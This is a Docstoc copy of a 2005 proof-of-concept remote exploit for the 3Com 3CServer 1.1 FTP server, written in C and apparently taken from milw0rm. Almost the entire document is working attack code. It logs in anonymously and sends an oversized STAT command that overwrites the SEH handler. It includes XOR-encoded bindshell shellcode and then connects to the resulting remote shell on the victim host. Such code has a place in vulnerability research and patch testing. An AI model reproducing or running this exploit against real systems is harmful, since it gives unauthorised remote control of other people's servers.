Docstoc

3CServer 1.1 FTP Server Remote Exploit

Document Sample
3CServer 1.1 FTP Server Remote Exploit Powered By Docstoc
					                                         3CServer 1.1 FTP Server Remote Exploit                         Page 1/5
  1    /*
  2
  3    subject:            Proof of Concept exploit for 3CServer v1.1 FTP server
  4    vendor:             3Com, http://support.3com.com/software/utilities_for_windows_32_bit.htm
  5    ‘date‘:             Mon Feb 7 18:10:01      2005
  6    notes:              universal offset, SEH ptr overwriting with variation
  7    author:             mandragore, mandragore@turingtest@gmail.com
  8
  9    */
  10
  11   #include   <stdio.h>
  12   #include   <strings.h>
  13   #include   <signal.h>
  14   #include   <netdb.h>
  15   #include   <sys/socket.h>
  16   #include   <netinet/in.h>
  17
  18   #define   NORM    "\033[00;00m"
  19   #define   GREEN   "\033[01;32m"
  20   #define   YELL    "\033[01;33m"
  21   #define   RED     "\033[01;31m"
  22
  23   #define BANNER GREEN "[%%] " YELL "mandragore’s sploit v1.0 for " RED "3CServer v1.1.007" NORM
  24
  25   #define fatal(x) { perror(x); exit(1); }
  26
  27   #define default_port 21
  28   #define default_user "anonymous"
  29   #define default_pass "weak@3com.com"
  30
  31   #define GPA 0x0045b968
  32   #define LLA 0x0045b964
  33
  34   #define offset 0x418A19 // call eax
  35
  36   unsigned char bsh[]={
  37   // 198 bytes, iat’s gpa at 0x1a, iat’s lla at 0x2b, port at 0x46 (1180), key 0xde
  38   0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA,
  39   0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,
  40   0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,
  41   0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4,0x90,0x89,0x21,0xC8,0x21,0x0E,
  42   0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,
  43   0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3,0x89,0x21,0xC8,0x21,0x0E,0xB4,
  44   0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,
  45   0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,
  46   0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,
  47   0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,
  48   0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,
  49   0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,
  50   0xAE,0xD6,0x21,0xC8,0x21,0x0E
  51   };
  52

mandragore                                                                                              02/07/2005
                                          3CServer 1.1 FTP Server Remote Exploit              Page 2/5
  53    char verbose=0;
  54
  55    static void start(void) __attribute__ ((constructor));
  56
  57    void start() {
  58            int gpa=GPA^0xdededede, lla=LLA^0xdededede;
  59            memcpy(bsh+0x1a,&gpa,4);
  60            memcpy(bsh+0x2b,&lla,4);
  61    }
  62
  63    int readcrap(int s) {
  64            struct timeval tv;
  65            fd_set fds;
  66            int ret;
  67            char buff[1024];
  68
  69            FD_ZERO(&fds);
  70            FD_SET(s,&fds);
  71
  72            bzero(buff,sizeof(buff));
  73
  74            while (1) {
  75                    tv.tv_sec=1;
  76                    tv.tv_usec=0;
  77                    if ( ret=select(s+1, &fds, NULL, NULL, (struct timeval *)&tv) < 0 )
  78                            break;
  79                    if (FD_ISSET(s,&fds)) {
  80                            // something to read
  81                            if ( read(s,buff,sizeof(buff),0) < 1 )
  82                                     break;
  83                    } else {
  84                             // timeout
  85                             return 1;
  86                    }
  87            }
  88
  89            return 0; // something went bad
  90    }
  91
  92    void usage(char *argv0) {
  93            int i;
  94
  95           printf("%s −d <host/ip> [opts]\n\n",argv0);
  96
  97           printf("Options:\n");
  98           printf(" −h undocumented\n");
  99           printf(" −u user [default: " default_user "]\n");
  100          printf(" −p pass [default: " default_pass "]\n");
  101          printf(" −P <port> for the shellcode [default: 1180]\n");
  102
  103          exit(1);
  104   }
mandragore                                                                                    02/07/2005
                                       3CServer 1.1 FTP Server Remote Exploit   Page 3/5
  105
  106   void shell(int s) {
  107           char buff[4096];
  108           int retval;
  109           fd_set fds;
  110
  111          printf("[+] connected!\n\n");
  112
  113          for (;;) {
  114                  FD_ZERO(&fds);
  115                  FD_SET(0,&fds);
  116                  FD_SET(s,&fds);
  117
  118          if (select(s+1, &fds, NULL, NULL, NULL) < 0)
  119                          fatal("[−] shell.select()");
  120
  121                   if (FD_ISSET(0,&fds)) {
  122                           if ((retval = read(1,buff,4096)) < 1)
  123                                   fatal("[−] shell.recv(stdin)");
  124                           send(s,buff,retval,0);
  125                   }
  126
  127                   if (FD_ISSET(s,&fds)) {
  128                           if ((retval = recv(s,buff,4096,0)) < 1)
  129                                   fatal("[−] shell.recv(socket)");
  130                           write(1,buff,retval);
  131                   }
  132           }
  133   }
  134
  135   int main(int argc, char **argv, char **env) {
  136           struct sockaddr_in sin;
  137           struct hostent *he;
  138           char *host; int port=default_port;
  139           char *Host; int Port=1180; char bindopt=1;
  140           int i,s;
  141           char *buff, *jmpback="\xe9\x35\xff\xff\xff";
  142           char *user=default_user; char *pass=default_pass;
  143
  144          printf(BANNER "\n");
  145
  146          if (argc==1)
  147                  usage(argv[0]);
  148
  149          for (i=1;i<argc;i+=2) {
  150                  if (strlen(argv[i]) != 2)
  151                          usage(argv[0]);
  152
  153                   switch(argv[i][1]) {
  154                           case ’d’:
  155                                   host=argv[i+1];
  156                                   break;
mandragore                                                                      02/07/2005
                                          3CServer 1.1 FTP Server Remote Exploit                                       Page 4/5
  157                                case ’u’:
  158                                        user=argv[i+1];
  159                                        break;
  160                                case ’p’:
  161                                        pass=argv[i+1];
  162                                        break;
  163                                case ’P’:
  164                                         Port=atoi(argv[i+1])?:1180;
  165                                         Port=Port ^ 0xdede;
  166                                         Port=(Port & 0xff) << 8 | Port >>8;
  167                                         memcpy(bsh+0x46,&Port,2);
  168                                         Port=Port ^ 0xdede;
  169                                         Port=(Port & 0xff) << 8 | Port >>8;
  170                                         break;
  171                                case ’v’:
  172                                         verbose++; i−−;
  173                                         break;
  174                                case ’h’:
  175                                         usage(argv[0]);
  176                                default:
  177                                         usage(argv[0]);
  178                                }
  179          }
  180
  181          if (verbose)
  182                  printf("verbose!\n");
  183
  184           if ((he=gethostbyname(host))==NULL)
  185                   fatal("[−] gethostbyname()");
  186
  187           sin.sin_family = 2;
  188           sin.sin_addr = *((struct in_addr *)he−>h_addr_list[0]);
  189           sin.sin_port = htons(port);
  190
  191           printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he−>h_addr_list[0])),port);
  192           printf("[.] will try to put a bindshell on port %d.\n",Port);
  193
  194   // −−−−−−−−−−−−−−−−−−−−       core
  195
  196           s=socket(2,1,6);
  197
  198           if (connect(s,(struct sockaddr *)&sin,16)!=0)
  199                   fatal("[−] connect()");
  200
  201           printf("[+] connected, sending exploit\n");
  202
  203          buff=(char *)malloc(4096);
  204          bzero(buff,4096);
  205
  206          readcrap(s);
  207          sprintf(buff,"USER %s\r\n",user);
  208          send(s,buff,strlen(buff),0);
mandragore                                                                                                             02/07/2005
                                      3CServer 1.1 FTP Server Remote Exploit   Page 5/5
  209           readcrap(s);
  210           sprintf(buff,"PASS %s\r\n",pass);
  211           send(s,buff,strlen(buff),0);
  212           readcrap(s);
  213
  214           bzero(buff,sizeof(buff));
  215           strcpy(buff,"STAT ");
  216           memset(buff+5,0x41,2000);
  217           memcpy(buff+5+0x571−strlen(bsh),&bsh,strlen(bsh));
  218           memcpy(buff+5+0x571,jmpback,strlen(jmpback));
  219           i=offset;
  220           memcpy(buff+5+0x5d9,&i,4);
  221
  222           send(s,buff,strlen(buff),0);
  223           readcrap(s);
  224
  225           free(buff);
  226
  227           close(s);
  228
  229   // −−−−−−−−−−−−−−−−−−−−   end of core
  230
  231           sin.sin_port = htons(Port);
  232           sleep(1);
  233           s=socket(2,1,6);
  234           if (connect(s,(struct sockaddr *)&sin,16)!=0)
  235                   fatal("[−] exploit most likely failed");
  236           shell(s);
  237
  238           exit(0);
  239   }
  240
  241   // milw0rm.com [2005−02−07]




mandragore                                                                     02/07/2005

				
DOCUMENT INFO